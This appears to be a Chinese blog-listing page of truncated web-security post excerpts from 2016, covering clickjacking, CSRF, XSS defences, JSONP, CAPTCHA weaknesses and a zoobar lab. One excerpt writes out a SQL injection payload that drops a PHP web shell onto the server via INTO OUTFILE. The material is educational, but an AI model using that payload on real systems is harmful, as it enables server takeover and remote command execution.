点击劫持 click jacking通过iframe加载被攻击网站到黑客自己维护的网站通过z-index叠加和position定位,将2个网站的信息堆叠在一个立体投影面上,通过opacity设置透明度。诱导普通用户点击按钮。 防御:js防御:if (top.location != self.loca
分类:
Web程序 时间:
2016-03-07 20:55:55
阅读次数:
179
E1:搭建zoobar网站开启apache服务和mysql服务service apache2 startservice mysql start建立数据库和表mysql->create database myzoo;use myzoo;create table Person(PersonID int
分类:
Web程序 时间:
2016-03-07 20:55:26
阅读次数:
213
sql注入获取webshell寻找sql注入页面,操作数据库的地方向网站写入sql语句' union select 1,2, '<?php system($_GET["cmd"]);?>' into outfile '/var/www/myzoo/cmd.php'发现mysql没有写入权限,于是在a
分类:
数据库 时间:
2016-03-07 20:48:02
阅读次数:
282
http://drops.wooyun.org/tips/141 常见验证码的弱点与验证码识别 insight-labs · 2013/06/08 11:36 0x00 简介 验证码作为一种辅助安全手段在Web安全中有着特殊的地位,验证码安全和web应用中的众多漏洞相比似乎微不足道,但是千里之堤毁于
分类:
其他好文 时间:
2016-03-02 23:54:28
阅读次数:
434
CSRF是什么? CSRF(Cross Site Request Forgery),中文是跨站点请求伪造。CSRF攻击者在用户已经登录目标网站之后,诱使用户访问一个攻击页面,利用目标网站对用户的信任,以用户身份在攻击页面对目标网站发起伪造用户操作的请求,达到攻击目的。 举个例子 简单版: 假如博客园
分类:
Web程序 时间:
2016-03-02 00:11:01
阅读次数:
187
因WEB安全原因,Ajax默认情况下是不能进行跨域请求的,遇到这种问题,自然难不倒可以改变世界的程序猿们,于是JSONP(JSON with Padding)被发明了,其就是对JSON的一种特殊,简单来说就是在原有的JSON数据上做了点手脚,从而达到可以让网页可以跨域请求。在现在互联网技术对“前后分离”大规模应用的时期,JSONP可谓意义重大啊。假设我们原来的JSON数据为 {“hello”:”你好...
分类:
Web程序 时间:
2016-03-01 16:04:06
阅读次数:
356
最近学习web安全问题总结如下: 一、跨站脚本攻击(xss) 向web页面插入恶意代码,主要为涉及到用户输入的地方。 永远不要相信用户的输入。需要做检测(比如特殊字符显示时进行转义)。 二、跨站点请求伪造(CSRF) 伪造连接请求,在用户不知道的情况下一用户的身份发送请求。 注意点:用token或者
分类:
Web程序 时间:
2016-02-28 22:43:09
阅读次数:
163
在我上一篇《前端安全之XSS攻击》文中,并没有把XSS攻击的解决办法说完整,而XSS的攻击又那么五花八门,有没有一招“独孤九剑”能够抗衡,毕竟那么多情况场景,开发人员无法一一照顾过来,而今天通过阅读《白帽子讲Web安全》这本书,对应对方式有了更好的总结,分为两类,一是服务端可以干的事,二是客户端可以
分类:
其他好文 时间:
2016-02-28 20:01:05
阅读次数:
298
在我上一篇《前端安全之XSS攻击》文中,并没有把XSS攻击的解决办法说完整,而XSS的攻击又那么五花八门,有没有一招“独孤九剑”能够抗衡,毕竟那么多情况场景,开发人员无法一一照顾过来,而今天通过阅读《白帽子讲Web安全》这本书,对应对方式有了更好的总结,分为两类,一是服务端可以干的事,二是客户端可以
分类:
其他好文 时间:
2016-02-28 06:31:05
阅读次数:
222
转http://www.cnblogs.com/TankXiao/archive/2012/03/21/2337194.html XSS 全称(Cross Site Scripting) 跨站脚本攻击, 是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript), 当用户
分类:
Web程序 时间:
2016-02-18 19:43:27
阅读次数:
251
